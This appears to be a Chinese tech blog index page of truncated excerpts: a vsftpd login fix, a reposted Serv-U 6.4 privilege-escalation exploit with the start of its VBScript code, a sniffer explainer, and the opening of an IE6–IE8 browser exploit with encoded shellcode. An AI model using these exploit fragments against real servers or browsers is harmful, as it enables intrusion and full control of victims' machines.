操作系统CentOS从5.3升级到5.4后，vsftpd也从vsftpd-2.0.5-12.el5_3.1.x86_64升级到vsftpd-2.0.5-16.el5.x86_64，配置文件未变化，但是正常用户登录后提示：
 $ ftp quwenqing.com
Connected to quwenqing.com (x.x.x.x).
220 (vsFTPd 2.0.5)
Name (quwenqing.com:test):
530 Please login with USER and PASS.
SSL not available
331 Please specify the p

[阅读全文]

看到很多服务器还在用serv-U 6.4版本，转载一下，提升安全。

在某安全论坛看到SERV-U又暴新漏洞，该漏洞通杀包括SERV-U 6.4及其以前的所有版本。如果服务器安装了SERV-U，攻击者在获得了网站的Webshell后利用该漏洞就可以进行提权，建立拥有管理员权限的帐户，进而完全控制服务器。
下面笔者搭建测试环境，利用该论坛提供的提权代码见图1进行漏洞测试。

提权的代码如下:

ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass "

[阅读全文]

    Sniffer，中文可以翻译为嗅探器，是一种基于被动侦听原理的网络分析方式。使用这种技术方式，可以监视网络的状态、数据流动情况以及网络上传输的信息。当信息以明文的形式在网络上传输时，便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式，便可以将网上传输的源源不断的信息截获。Sniffer技术被广泛地应用于网络故障诊断、协议分析、应用性能分析和网络安全保障等各个领域。
    Sniffer被 Network General公司注册为商标，这家公司以出品Sniffer Pro系列产品而知名。目前最新版本为Sniffer

[阅读全文]

影响IE6-IE8全系列，传说中Google“被入侵”所用到的那份。

<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3

[阅读全文]

Hadoop  

[阅读全文]